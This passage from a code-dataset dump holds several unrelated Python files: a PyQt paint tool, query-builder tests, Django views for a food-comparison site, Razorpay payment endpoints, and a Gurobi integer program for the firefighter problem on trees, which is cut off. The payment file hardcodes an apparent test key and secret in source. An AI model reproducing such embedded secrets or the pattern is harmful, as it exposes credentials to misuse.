WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectBrush),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/brush.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectSmartPen),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/smartPen.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectEraser),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/eraser.png\"))\n ),\n\n ]\n\n tools[0].setClickStyle()\n\n return tools\n\n def __createFileTools(self, width, height):\n tools = [\n WidgetItem(\n width, height,\n self.saveImage,\n 
QtGui.QIcon(QtGui.QPixmap(\"../resources/save.png\")),\n                True\n            ),\n            WidgetItem(\n                width, height,\n                self.openFileNameDialog,\n                QtGui.QIcon(QtGui.QPixmap(\"../resources/open.png\")),\n                True\n            ),\n        ]\n\n        return tools\n\n    def openFileNameDialog(self):\n        options = QFileDialog.Options()\n\n        options |= QFileDialog.DontUseNativeDialog\n        fileName, _ = QFileDialog.getOpenFileName(self, \"QFileDialog.getOpenFileName()\", \"\",\n                                                  \"Image Files (*.png *.jpg *.bmp)\", options=options)\n        if fileName:\n            print(fileName)\n            self.canvas.clearImage()\n            self.image = QImage(fileName)\n\n    def saveImage(self):\n        options = QFileDialog.Options()\n\n        options |= QFileDialog.DontUseNativeDialog\n        fileName, _ = QFileDialog.getSaveFileName(self, \"QFileDialog.getSaveFileName()\", \"\",\n                                                  \"Image Files (*.png *.jpg *.bmp)\", options=options)\n        if fileName:\n            print(fileName)\n            if \".png\" not in fileName:\n                fileName += \".png\"\n\n            self.canvas.saveCanvas(fileName)\n\n","repo_name":"alexzhukovwork/GraphicEditor","sub_path":"app/widgets/window_view.py","file_name":"window_view.py","file_ext":"py","file_size_in_byte":7618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"27877574717","text":"from lollygag.query_builder import QueryBuilder\n\n\ndef test_can_build_name_query():\n    qb = QueryBuilder().name('div')\n    assert qb.raw_query == {'name': 'div'}\n\n\ndef test_can_build_chained_query():\n    qb = QueryBuilder().name('foo')._and().attribute('bar', 'b.*')\n    assert qb.raw_query == {\n        'and': ({\n            'name': 'foo'\n        }, {\n            'attribute': {\n                'name': 'bar',\n                'value': 'b.*'\n            }\n        })\n    }\n\n\ndef test_longer_chained_query():\n    qb = QueryBuilder().name('foo')._and().attribute(\n        'bar', 'b.*')._or().data('kewlaid')\n    assert qb.raw_query == {\n        'or': ({\n            'and': ({\n                'name': 'foo'\n            }, {\n                'attribute': {\n                    'name': 'bar',\n                    'value': 'b.*'\n                }\n            })\n        }, {\n            'data': 'kewlaid'\n        })\n    }\n\n\ndef test_not_query():\n    qb = QueryBuilder()._not().name('div')\n    assert qb.raw_query == {'not': {'name': 'div'}}\n\n\ndef test_not_chains():\n    qb = QueryBuilder()._not().name('div')._and()._not().data('foo')\n    assert qb.raw_query == {\n        'and': ({\n            'not': {\n                'name': 'div'\n            }\n        }, {\n            'not': {\n                'data': 'foo'\n            }\n        })\n    }\n","repo_name":"snorrwe/lollygag","sub_path":"test/test_query_builder.py","file_name":"test_query_builder.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"31543923849","text":"from random import randint\nimport json\nimport operator\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom googleapiclient.discovery import build\nfrom App import values_data, models\nfrom django import template\nfrom django.shortcuts import render, redirect\nfrom App.forms import FruitCreationForm, commentinputforme\nfrom django.contrib import messages\n\nregister = template.Library()\n\n\ndef index(request):\n    \"\"\"\n    Renders the main page\n\n    :param request: object with the request details\n    :type request: :class:`django.http.HttpRequest`\n    :return: server response object with HTML inside\n    :rtype: :class:`django.http.HttpResponse`\n    \"\"\"\n    context = {}\n    data_guest = values_data.data_guest\n    data_loged = values_data.data_loged\n    indg = randint(0, len(data_guest) - 1)\n    indl = randint(0, len(data_loged) - 1)\n    context[\"index_g\"] = data_guest[indg]\n    context[\"index_l\"] = data_loged[indl]\n\n    return render(request, \"index.html\",
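The lollygag QueryBuilder tests embedded above pin down a small fluent-builder contract: each leaf call folds into the running query dict, _and()/_or() make the current query the left operand of a tuple, and _not() wraps the next leaf. A minimal builder that satisfies all five tests (an illustrative reconstruction, not lollygag's actual implementation):

class QueryBuilder:
    def __init__(self):
        self.raw_query = {}
        self._pending_op = None     # 'and' / 'or' waiting for a right-hand operand
        self._negate_next = False   # set by _not(), consumed by the next leaf

    def _push(self, leaf):
        if self._negate_next:
            leaf = {'not': leaf}
            self._negate_next = False
        if self._pending_op:
            self.raw_query = {self._pending_op: (self.raw_query, leaf)}
            self._pending_op = None
        else:
            self.raw_query = leaf
        return self

    def name(self, value):
        return self._push({'name': value})

    def data(self, value):
        return self._push({'data': value})

    def attribute(self, name, value):
        return self._push({'attribute': {'name': name, 'value': value}})

    def _and(self):
        self._pending_op = 'and'
        return self

    def _or(self):
        self._pending_op = 'or'
        return self

    def _not(self):
        self._negate_next = True
        return self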
 context)\n\n\n@login_required\ndef food_creation(request):\n    \"\"\"\n    Renders the page for adding your own food\n\n    :param request: object with the request details\n    :type request: :class:`django.http.HttpRequest`\n    :return: server response object with HTML inside\n    :rtype: :class:`django.http.HttpResponse`\n    \"\"\"\n    context = {}\n    if request.method == 'POST':\n        form = FruitCreationForm(request.POST, request.FILES)\n\n        name = form.data['title']\n        description = form.data['description']\n        vitamins = request.POST.getlist('vitamins')\n        deathdoze = form.data['deathdoze']\n        interesting_fact = form.data['interesting_fact']\n        image = form.files['image']\n        calories = form.data['calories']\n\n        fruit = models.Food(name=name, author=request.user, searched=0,\n                            description=description, deathdoze=deathdoze,\n                            image=image, calories=calories,\n                            interesting_fact=interesting_fact)\n        fruit.save()\n\n        for vitamin in vitamins:\n            fruit.vitamins.create(name=vitamin)\n\n        messages.success(request, 'Фрукт создан')\n\n    form = FruitCreationForm()\n    context['form'] = form\n\n    return render(request, 'food_creation.html', context=context)\n\n\ndef food_list_page(request):\n    \"\"\"\n    Renders the page with all the food\n\n    :param request: object with the request details\n    :type request: :class:`django.http.HttpRequest`\n    :return: server response object with HTML inside\n    :rtype: :class:`django.http.HttpResponse`\n    \"\"\"\n    context = {}\n    search_query = request.GET.get('search_fruit', '')\n\n    if search_query:\n        food = models.Food.objects.filter(name__iregex=search_query)\n        context['food'] = food\n    else:\n        food = models.Food.objects.all()\n        context['food'] = food\n\n    return render(request, \"food_list.html\", context)\n\n\ndef food_item_page(request):\n    \"\"\"\n    Renders the page for a single Food database item\n\n    :param request: object with the request details\n    :type request: :class:django.http.HttpRequest\n    :return: server response object with HTML inside\n    :rtype: :class:django.http.HttpResponse\n    \"\"\"\n\n    food_id = request.GET['id']\n    food = models.Food.objects.get(id=food_id)\n    vitamins = models.Food.get_vitamins_by_food(food)\n    if 'id' in request.GET:\n        context = {\n            'food': food,\n            'vitamins': vitamins,\n            'video_links': get_youtube_links(food_name=food.name)\n        }\n    else:\n        context = {\n            'food': 'Ошибка',\n        }\n\n    if request.POST.get('like'):\n        models.Like.objects.update_or_create(\n            fruit=food,\n            author=request.user\n        )\n        messages.success(request, \"Вы лайкнули фрукт\")\n    if request.POST.get('delete_like'):\n        try:\n            models.Like.objects.get(\n                fruit=food,\n                author=request.user\n            ).delete()\n            messages.info(request, \"Лайк удалён\")\n        except:\n            pass\n    if request.POST.get('add_to_comprasion'):\n        models.Comprasion.objects.update_or_create(\n            fruit=food,\n            author=request.user\n        )\n        messages.success(request, \"Добавлено к сравнению\")\n    if request.POST.get('delete_from_comprasion'):\n        try:\n            models.Comprasion.objects.get(\n                fruit=food,\n                author=request.user\n            ).delete()\n            messages.info(request, \"Удалено из сравнения\")\n        except:\n            pass\n\n    return render(request, \"food_item.html\", context)\n\n@login_required\ndef profile_page(request):\n    \"\"\"\n    Renders the profile page\n\n    :param request: object with the request details\n    :type request: :class:`django.http.HttpRequest`\n    :return: server response object with HTML inside\n    :rtype: :class:`django.http.HttpResponse`\n    \"\"\"\n    context = {}\n    liked = models.Like.objects.filter(author=request.user)\n    try:\n
        context['liked'] = [liked[len(liked) - 3], liked[len(liked) - 2], liked[len(liked) - 1]]\n    except:\n        context['liked'] = liked\n    return render(request, 'profile/page.html', context)\n\n@login_required\ndef like_page(request):\n    \"\"\"\n    Renders the page with liked food and the meal schedule\n\n    :param request: object with the request details\n    :type request: :class:`django.http.HttpRequest`\n    :return: server response object with HTML inside\n    :rtype: :class:`django.http.HttpResponse`\n    \"\"\"\n    context = {}\n    liked = models.Like.get_by_user(request.user)\n    context['liked'] = liked\n\n    if 'breakfast' in request.POST:\n        food_id = request.POST['breakfast']\n        food = models.Food.objects.get(id=food_id)\n        models.Breakfast.objects.update_or_create(\n            breakfast=food,\n            author=request.user\n        )\n        breakfast_food = models.Breakfast.objects.all()\n        context['breakfast_food'] = breakfast_food\n\n    if 'lunch' in request.POST:\n        food_id = request.POST['lunch']\n        food = models.Food.objects.get(id=food_id)\n        models.Lunch.objects.update_or_create(\n            lunch=food,\n            author=request.user\n        )\n        lunch_food = models.Lunch.objects.all()\n        context['lunch_food'] = lunch_food\n\n    if 'dinner' in request.POST:\n        food_id = request.POST['dinner']\n        food = models.Food.objects.get(id=food_id)\n        models.Dinner.objects.update_or_create(\n            dinner=food,\n            author=request.user\n        )\n        dinner_food = models.Dinner.objects.all()\n        context['dinner_food'] = dinner_food\n\n    try:\n        food_id = request.POST['breakfast_delete']\n        food = models.Food.objects.get(id=food_id)\n        models.Breakfast.objects.get(\n            breakfast=food,\n            author=request.user\n        ).delete()\n    except:\n        pass\n\n    try:\n        food_id = request.POST['lunch_delete']\n        food = models.Food.objects.get(id=food_id)\n        models.Lunch.objects.get(\n            lunch=food,\n            author=request.user\n        ).delete()\n    except:\n        pass\n\n    try:\n        food_id = request.POST['dinner_delete']\n        food = models.Food.objects.get(id=food_id)\n        models.Dinner.objects.get(\n            dinner=food,\n            author=request.user\n        ).delete()\n    except:\n        pass\n\n    return render(request, 'like_page.html', context)\n\n\ndef statistics(request):\n    \"\"\"\n    Renders the page with food sorted by rating\n    (including food that has no rating yet)\n\n    :param request: object with the request details\n    :type request: :class:django.http.HttpRequest\n    :return: server response object with HTML inside\n    :rtype: :class:django.http.HttpResponse\n    \"\"\"\n\n    context = {}\n    rating_dict = {}\n    rating_list = list()\n\n    rating = models.Like.objects.all()\n    food = models.Food.objects.all()\n\n    for item in rating:\n        if item.fruit in rating_dict.keys():\n            rating_dict[item.fruit] += 1\n        else:\n            rating_dict[item.fruit] = 1\n\n    for item in food:\n        if item not in rating_dict.keys():\n            rating_dict[item] = 0\n\n    for item in rating_dict:\n        rating_list.append([item, rating_dict[item]])\n\n    context = {\n        'list': sorted(rating_list, key=operator.itemgetter(1))[::-1]\n    }\n\n    return render(request, 'food_statistics.html', context)\n\n\ndef get_youtube_links(*, food_name):\n    \"\"\"\n    Fetches links to YouTube videos about a given food\n\n    :param food_name: name of the food to search for\n    :type food_name: str\n    :return: list containing 3 links\n    :rtype: list\n    \"\"\"\n    try:\n        with open('youtube_api_key.json', 'r') as data:\n            API_KEY = json.load(data)['api_key']\n\n        youtube = build(\"youtube\", \"v3\", developerKey=API_KEY)\n\n        search_response = youtube.search().list(\n            q=f\"факты о {food_name}\",\n            type=\"video\",\n            part=\"id,snippet\",\n
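statistics() above tallies likes with manual dict bookkeeping in three passes; collections.Counter expresses the same zero-filled ranking directly (a sketch over plain values rather than ORM rows):

from collections import Counter

likes = ['apple', 'pear', 'apple', 'plum', 'apple', 'pear']  # one entry per Like row
all_food = ['apple', 'pear', 'plum', 'kiwi']                 # every Food row

counts = Counter(likes)
ranking = sorted(((name, counts.get(name, 0)) for name in all_food),
                 key=lambda pair: pair[1], reverse=True)
print(ranking)  # [('apple', 3), ('pear', 2), ('plum', 1), ('kiwi', 0)]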
maxResults=3,\n relevanceLanguage='ru',\n safeSearch='moderate',\n videoDefinition='high',\n videoEmbeddable='true',\n ).execute()\n\n video_urls = []\n for search_result in search_response.get(\"items\", []):\n if search_result[\"id\"][\"kind\"] == \"youtube#video\":\n video_urls.append(f\"https://www.youtube.com/embed/{search_result['id']['videoId']}\")\n\n return video_urls\n except Exception as error:\n print(repr(error))\n return None\n\n@login_required\ndef complaint_add(request):\n \"\"\"\n Отображение страницы подачи жалоб\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n context = {\n \"id\": request.GET.get(\"id\", 0)\n }\n\n return render(request, \"complaint_add.html\", context)\n\n@login_required\ndef complaint_list(request):\n \"\"\"\n Отображение страницы со всеми жалобами\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n context = {}\n if request.method == 'POST':\n fruit = models.Food.objects.filter(id=request.POST.get('id'))[0]\n author = request.user\n complaint = request.POST.get('btnradio')\n models.Complaint.add(author, complaint, fruit)\n\n all_complaints = models.Complaint.get_all()\n context['all_complaints'] = all_complaints\n\n return render(request, \"complaint_list.html\", context)\n\n@login_required\ndef add_comprasion(request):\n \"\"\"\n Обработка AJAX запроса по добавлению еды в таблицу для сравнения\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n\n fruit = request.GET.get('id')\n if not (models.Comprasion.get_by_user(request.user).__contains__(models.Food.objects.get(id=fruit))) \\\n and len(models.Comprasion.get_by_user(request.user)) < 4:\n models.Comprasion.add(models.Food.objects.get(id=fruit), author=request.user)\n\n context = {\n 'data': fruit\n }\n return JsonResponse(context)\n\n@login_required\ndef comprasion_page(request):\n \"\"\"\n Отображение страницы сравнения еды\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n context = {}\n context['food'] = models.Comprasion.get_by_user(request.user)\n context['vitamins'] = []\n for i in context['food']:\n context['vitamins'].append(models.Food.get_vitamins_by_food(i))\n\n context['count_food'] = len(context['food'])\n\n context['zip'] = zip(context['food'], context['vitamins'])\n\n if request.POST.get('clear_comprasion'):\n comprasion_list = models.Comprasion.get_by_user(request.user)\n for food in comprasion_list:\n models.Comprasion.objects.get(fruit=food, author=request.user).delete()\n\n return redirect(\"/comprasion/page/\")\n\n return render(request, \"comprasion_page.html\", context)\n\n\n@login_required\ndef delete_user(request):\n \"\"\"\n Обработка и отображение удаления профиля\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n user = request.user\n user.delete()\n return render(request, 'profile/page_deleted.html')\n\n\ndef comments_page(request):\n 
\"\"\"\n Отображение страницы добавления отзыва о сервисе\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n context = {}\n if request.method == \"POST\":\n context['form'] = commentinputforme()\n f = commentinputforme(request.POST)\n if f.is_valid():\n obj = models.Comment(author=request.user, text=f.data['text'])\n obj.save()\n else:\n context['form'] = commentinputforme()\n comentdata = models.Comment.objects.all()\n context['comments'] = comentdata\n return render(request, 'comments.html', context)\n\n@login_required\ndef add_like(request):\n \"\"\"\n Обработка AJAX запроса, который добавляет лайк определенному объекту еды\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: HTTP response that consumes data to be serialized to JSON\n :rtype: :class:`django.http.HttpResponse`\n \"\"\"\n context = {\n 'data': 'ok'\n }\n try:\n likes = models.Like.objects.filter(\n author=request.user,\n fruit=models.Food.objects.filter(id=request.GET.get('id'))[0]\n )[0]\n except Exception as error:\n context = {\n 'data': str(repr(error))\n }\n like = models.Like.objects.create(\n fruit=models.Food.objects.filter(id=request.GET.get('id'))[0],\n author=request.user\n ).save()\n\n return JsonResponse(context)\n","repo_name":"Krahjotdaan/FoodComparison-MSHP","sub_path":"App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15954,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74067664553","text":"from api.payment.models import Payment\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.response import Response\nimport razorpay\nfrom api.order.models import Order\nfrom rest_framework.permissions import AllowAny\nfrom api.customer.models import Customer\nfrom api.table.models import Table\nfrom api.order.models import Order\n\n# Create your views here.\n\nKEY_ID = \"rzp_test_U4xhl2f60ZY1nb\"\nKEY_SECRET = \"wkkx9LsU61tFcpAdlJ6IBBdJ\"\n\nclient = razorpay.Client(auth=(KEY_ID, KEY_SECRET))\n\n\n@api_view([\"POST\"])\n@permission_classes((AllowAny,))\ndef initiate_payment_process(request):\n\n try:\n order_id = request.data[\"order_id\"]\n phone_number = request.data[\"phone_number\"]\n except KeyError:\n return Response({\"detail\": \"No order id was provided.\"})\n\n try:\n order = Order.objects.get(id=order_id)\n total = order.get_total_after_gst()\n except Order.DoesNotExist:\n return Response({\"detail\": \"Invalid order id\"})\n\n order_amount = int(total * 100)\n order_currency = \"INR\"\n order_receipt = order_id\n notes = {\"phone_number\": phone_number}\n print(\"FLAG 1\")\n response = client.order.create(\n dict(\n amount=order_amount,\n currency=order_currency,\n receipt=order_receipt,\n notes=notes,\n payment_capture=\"0\",\n )\n )\n return Response({\"data\": response})\n\n\n@api_view([\"POST\"])\n@permission_classes((AllowAny,))\ndef payment_status(request):\n\n try:\n payment_detail = {\n \"razorpay_payment_id\": request.data[\"razorpay_payment_id\"],\n \"razorpay_order_id\": request.data[\"razorpay_order_id\"],\n \"razorpay_signature\": request.data[\"razorpay_signature\"],\n }\n amount = request.data[\"amount\"]\n customer = request.customer\n # print(payment_detail, \" \", amount)\n except KeyError:\n return Response({\"detail\": \"Something went wrong\"})\n\n try:\n status = 
client.utility.verify_payment_signature(payment_detail)\n client.payment.capture(\n payment_detail[\"razorpay_payment_id\"], amount, {\"currency\": \"INR\"},\n )\n # customer = Customer.objects.get(id=customer)\n customer.has_paid = True\n customer.is_on_table = False\n customer.token = 0\n table = Table.objects.get(customer=customer.id)\n table.is_occupied = False\n customer.save()\n table.save()\n payment = Payment.objects.create(\n transaction_id=payment_detail[\"razorpay_payment_id\"],\n customer=customer,\n amount=float(amount) / 100,\n )\n order = Order.objects.filter(customer=request.customer, ordered=False)\n order.update(payment=payment, ordered=True)\n return Response({\"detail\": \"ok\"})\n except Order.DoesNotExist:\n return Response({\"error\": \"Error in payment\"})\n\n\n@api_view([\"POST\"])\n@permission_classes((AllowAny,))\ndef payment_cash_card_status(request):\n\n try:\n amount = request.data[\"amount\"]\n invoice_no = request.data[\"invoice_no\"]\n customer = request.customer\n # print(payment_detail, \" \", amount)\n except KeyError:\n return Response({\"detail\": \"Something went wrong\"})\n\n try:\n\n # customer = Customer.objects.get(id=customer)\n customer.has_paid = True\n customer.is_on_table = False\n customer.token = 0\n table = Table.objects.get(customer=customer.id)\n table.is_occupied = False\n customer.save()\n table.save()\n payment = Payment.objects.create(\n transaction_id=\"cash_\" + invoice_no, customer=customer, amount=amount,\n )\n order = Order.objects.filter(customer=request.customer, ordered=False)\n order.update(payment=payment, ordered=True)\n return Response({\"detail\": \"ok\"})\n except Order.DoesNotExist:\n return Response({\"error\": \"Error in payment\"})\n","repo_name":"hemik000/self-ordering-restaurant-backend","sub_path":"api/payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42538198454","text":"\"\"\"\nMoving Firefighter Problem on Trees\nInteger Linear Programming Solution\nAuthor: Mauro Alejandro Montenegro Meza\n\"\"\"\nimport time as tm\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\n\nimport networkx as nx\nimport numpy\nimport pulp as pl\nfrom gurobipy import *\n\nfrom utils.utils import GDN\nfrom utils.utils import generateInstance\nfrom utils.utils import tracing_mem\nfrom utils.utils import tracing_start\n\nBN = 10000 # Big Number for Restrictions\nimport numpy as np\n\n\nclass ILP_MFF():\n def __init__(self, mode, load, path, config):\n # Individual Variables\n self.n_variables = []\n self.n_restrictions = []\n\n # Variables to plot with average\n self.times = []\n self.total_times = []\n self.total_saved = []\n self.saved = []\n\n # Control Variables\n self.config = config\n self.mode = mode\n self.load = load\n if self.mode == 'batch':\n self.path = path\n else:\n self.w_path = os.walk(Path.cwd() / 'Instance')\n self.path = path + '/Instance'\n def solve(self):\n # Traverse and save Tree Node Sizes dirs\n size_dirs = []\n for d in next(os.walk((self.path))):\n size_dirs.append(d)\n size_dirs = sorted(size_dirs[1])\n for dir in size_dirs:\n instance_path = self.path / str(dir)\n # Traverse each instance\n inst_dirs = []\n for i in next(os.walk((instance_path))):\n inst_dirs.append(i)\n inst_dirs = sorted(inst_dirs[1])\n # Solve IQP problem for each instance\n for inst in inst_dirs:\n print(\"\\n\\nCompute solution for size: {n}, instance: {i}\".format(n=dir, i=inst))\n # 
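`payment_status` above saves the customer, the table, a new `Payment` and the open orders as independent writes after verifying the Razorpay signature; a failure midway would leave those records inconsistent. A sketch of the same steps under Django's `transaction.atomic`, using only names that appear in the source:

```python
from django.db import transaction

with transaction.atomic():
    # All of the writes below commit together or roll back together.
    customer.has_paid = True
    customer.is_on_table = False
    customer.token = 0
    customer.save()

    table = Table.objects.get(customer=customer.id)
    table.is_occupied = False
    table.save()

    payment = Payment.objects.create(
        transaction_id=payment_detail["razorpay_payment_id"],
        customer=customer,
        amount=float(amount) / 100,
    )
    Order.objects.filter(customer=customer, ordered=False).update(
        payment=payment, ordered=True
    )
```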
Load Instance\n instance = generateInstance(self.load, instance_path, str(inst))\n T = instance[0]\n N = instance[1]\n starting_fire = instance[2]\n T_Ad_Sym = instance[3]\n\n # --- MODEL-------\n m = Model(\"ILP_FF\")\n m.Params.outputFlag = 1 # 0 - Off // 1 - On\n m.setParam(\"MIPGap\", self.config['experiment']['mip_gap'])\n m.setParam(\"Method\", self.config['experiment']['method'])\n m.setParam(\"Presolve\", self.config['experiment'][\n 'presolve']) # -1 - Automatic // 0 - Off // 1 - Conservative // 2 - Aggresive\n m.setParam(\"NodefileStart\", self.config['experiment']['nodefilestart'])\n m.setParam(\"Threads\", self.config['experiment']['threads'])\n\n # ---InitialPos_Node_Variables----\n # (X_phase0_node1), (X_phase0_node2), .... ,(X_phase0_nodeN)\n initial_vars = []\n for i in range(N):\n initial_vars.append(0)\n if i != starting_fire:\n initial_vars[i] = m.addVar(vtype=GRB.BINARY, name=\"x,%s\" % str(0) + \",\" + str(i))\n m.update()\n\n # ---InitialPos_Node_Variables----\n # (X_phase1_node0_node0), (X_phase1_node0_node1), .... ,(X_phase1_node0_nodeN),(X_phase1_node1_node0),...,(X_phase1_nodeN_nodeN)\n # (X_phase2_node0_node0), (X_phase2_node0_node1), ...., (X_phase2_node0_nodeN),(X_phase2_node1_node0),...,(X_phase2_nodeN_nodeN)\n vars = []\n for i in range(N - 1):\n temp_1 = []\n for j in range(N):\n temp_2 = []\n for k in range(N):\n temp_2.append(0)\n temp_1.append(temp_2)\n vars.append(temp_1)\n\n for phase in range(N - 1):\n for node_1 in range(N):\n for node_2 in range(N):\n if ((node_1 != starting_fire) and (node_2 != starting_fire)):\n #print(\"Adding (x,{i},{j},{k})\".format(i=phase+1,j=node_1,k=node_2))\n vars[phase][node_1][node_2] = m.addVar(vtype=GRB.BINARY,\n name=\"x,%s\" % str(phase + 1) + \",\" + str(node_1) + \",\" + str(node_2))\n m.update()\n #print(starting_fire)\n #print(vars)\n\n # -------- OBJECTIVE FUNCTION ----------\n Nodes = list(T.nodes)\n Nodes.remove(N)\n Nodes.sort()\n weights = np.zeros(N)\n i = 0\n\n for node in Nodes:\n weights[i] = len(nx.descendants(T, node)) + 1\n i += 1\n\n # Sum initial vars to objective\n objective = 0\n weights_transpose = np.array(weights).T\n objective += np.dot(weights_transpose, initial_vars)\n\n # Sum rest of variables\n for i in range(N - 1):\n for j in range(N):\n w_copy = weights_transpose.copy()\n w_copy[j] = 0\n objective += np.dot(w_copy, vars[i][j])\n m.setObjective(objective, GRB.MAXIMIZE)\n\n #print(objective)\n count_const = 0\n\n # ----------SUBJECT TO---------------------\n\n # Constraint 1\n # Initial position to first saved vertex is unique\n sum_initial_vars = 0\n for i in range(N):\n sum_initial_vars += initial_vars[i]\n count_const += 1\n m.addConstr(sum_initial_vars <= 1)\n\n # Constraint 2\n # Only one variable active for each phase\n sum_vars = 0\n for phase in range(N-1):\n sum_vars = 0\n for node_1 in range(N):\n for node_2 in range(N):\n sum_vars += vars[phase][node_1][node_2]\n count_const += 1\n m.addConstr(sum_vars <= 1)\n\n # Constraint 3\n # Valid first reachable vertex\n levels = nx.single_source_shortest_path_length(\n T, starting_fire\n )\n sorted_burning_times = numpy.zeros(N)\n\n # Sorted Burning time for each node (from 0 to N)\n for i in range(N):\n sorted_burning_times[i] = levels[i]\n\n # Constraint for initial Position\n initial_time_const = np.dot(T_Ad_Sym[N, 0:N], initial_vars)\n initial_time_const_ = np.dot(sorted_burning_times.T, initial_vars)\n count_const += 1\n m.addConstr(initial_time_const <= initial_time_const_, name=\"Init_time_Const\")\n\n # Constraint for next 
phases\n for phase in range(N - 1):\n q_1 = 0\n q_2 = 0\n for phase_range in range(0, phase + 1):\n for node_i in range(N):\n for node_j in range(N):\n q_1 += T_Ad_Sym[node_i][node_j] * vars[phase_range][node_i][node_j]\n q_1 += initial_time_const\n for i in range(N):\n q_2 += np.dot(sorted_burning_times.T, vars[phase][i])\n count_const += 1\n m.addConstr(q_1 <= q_2, name=\"Q,%s\" % str(phase))\n\n # Constraint 4\n # Leaf nodes\n leaf_nodes = [node for node in T.nodes() if T.in_degree(node) != 0 and T.out_degree(node) == 0]\n restricted_ancestors = {}\n for leaf in leaf_nodes:\n restricted_ancestors[leaf] = list(nx.ancestors(T, leaf))\n restricted_ancestors[leaf].remove(starting_fire)\n restricted_ancestors[leaf].insert(0, leaf)\n\n for leaf in restricted_ancestors:\n l_q = 0\n for node in restricted_ancestors[leaf]:\n for phase in range(N - 1):\n for input_node in range(N):\n if input_node!= node:\n l_q += vars[phase][input_node][node]\n l_q += initial_vars[node]\n count_const += 1\n m.addConstr(l_q <= 1)\n\n # Constraint 5\n # Consistency Restriction\n for i in range(N):\n l_q = 0\n l_q += initial_vars[i]\n for j in range(N):\n for k in range(N):\n if j != i:\n l_q += vars[0][j][k]\n count_const += 1\n m.addConstr(l_q <= 1)\n\n for i in range(N): # For each node v\n for j in range(N - 2): # For each phase\n l_q = 0\n for k in range(N): # For each node u\n l_q += vars[j][k][i]\n for z in range(N):\n for p in range(N):\n if z != i:\n l_q += vars[j + 1][z][p]\n count_const += 1\n m.addConstr(l_q <= 1)\n\n # Constraint 6\n # Consecutive solution constraint\n c_1 = 0\n c_2 = 0\n for i in range(N):\n c_1 += initial_vars[i]\n for j in range(N):\n for k in range(N):\n c_2 += vars[0][j][k]\n count_const += 1\n m.addConstr(c_1 >= c_2)\n\n for z in range(N-2):\n c_1=0\n c_2=0\n for i in range(N):\n for j in range(N):\n c_1 += vars[z][i][j]\n c_2 += vars[z+1][i][j]\n m.addConstr(c_1 >= c_2)\n\n #m.update()\n #print(m.display())\n # ----------------- Optimize Step--------------------------------\n m.optimize()\n runtime = m.Runtime\n self.saved.append(m.ObjVal)\n self.times.append(runtime)\n sol = []\n for v in m.getVars():\n if v.X > 0:\n sol.append(v)\n self.solution = sol\n\n # Save Solution\n self.saveSolution(instance_path, str(inst), sol, m.Objval, runtime)\n # Save\n self.total_saved.append(self.saved)\n self.total_times.append(self.times)\n # Reset\n self.saved = []\n self.times = []\n self.Statistics()\n\n def saveSolution(self, instance_path, instance, solution, saved, time):\n output_path = instance_path / instance / \"Solution_Summary_ILP\"\n with open(output_path, \"w\") as writer:\n writer.write(\"Solution: {}\\n\".format(solution))\n writer.write(\"Saved: {}\\n\".format(saved))\n writer.write(\"RunTime: {}\\n\".format(time))\n\n writer.write(\"G_mipgap: {}\\n\".format(self.config['experiment']['mip_gap']))\n writer.write(\"G_threads: {}\\n\".format(self.config['experiment']['threads']))\n writer.write(\"presolve: {}\\n\".format(self.config['experiment']['presolve']))\n writer.write(\"method: {}\\n\".format(self.config['experiment']['method']))\n\n def Statistics(self):\n time_mean = []\n time_std_dv=[]\n saved_mean = []\n saved_std_dv = []\n # Statistics for run time\n for node_size in self.total_times:\n m = np.mean(node_size)\n std = np.std(node_size)\n time_mean.append(m)\n time_std_dv.append(std)\n time_std_dv = np.asarray(time_std_dv)\n time_mean = np.asarray(time_mean)\n\n # Statistics for saved vertices\n for node_size in self.total_saved:\n m = np.mean(node_size)\n std = 
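Two `networkx` idioms carry most of the model above: the objective weights each vertex by the size of the subtree it saves (`nx.descendants`), and constraint 4 walks each leaf's path back toward the root (`nx.ancestors` plus the `in_degree`/`out_degree` leaf test). A self-contained toy check of both pieces (the tree itself is made up):

```python
import networkx as nx

# Toy rooted tree; the fire starts at node 0 and edges point away from it.
T = nx.DiGraph([(0, 1), (0, 2), (1, 3), (1, 4)])

# Objective weights above: defending v saves v plus all of its descendants.
weights = {v: len(nx.descendants(T, v)) + 1 for v in T.nodes if v != 0}
assert weights == {1: 3, 2: 1, 3: 1, 4: 1}

# Constraint 4 above: at most one defended vertex per root-to-leaf path.
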